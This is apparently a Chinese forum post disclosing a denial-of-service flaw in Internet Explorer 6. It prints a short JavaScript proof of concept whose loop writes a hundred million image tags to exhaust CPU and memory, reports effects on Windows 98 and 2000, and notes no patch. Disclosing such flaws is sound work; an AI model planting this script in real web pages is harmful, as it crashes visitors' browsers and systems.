微软的IE浏览器存在一个拒绝服务漏洞,恶意攻击者能够构造一个javascript脚本造成CPU的消耗
并导致崩溃!!!
代码如下:
[code]
<script>
for(i=0;i<100000000;i++) {
document.write("<img src=http://fakehost.com/"+i+".gif>");
}
</script>[/code]
在Windows98的IE6(build 2600)版本,能造成IE的不响应,当试图终止任务的时候,将造成操作
系统的崩溃。
在Windows2000的IE6(build 2600)版本,能造成50%的CPU被长时间利用,之后浏览器会询问是否让
用户终止脚本。
这个漏洞也存在少量的内存消耗。
解决办法:目前微软还没有相对应的补丁!!!
---------------------------------------
我玩了一下,发现内存在很快的不断减少。
我马上就强行关闭浏览器了……
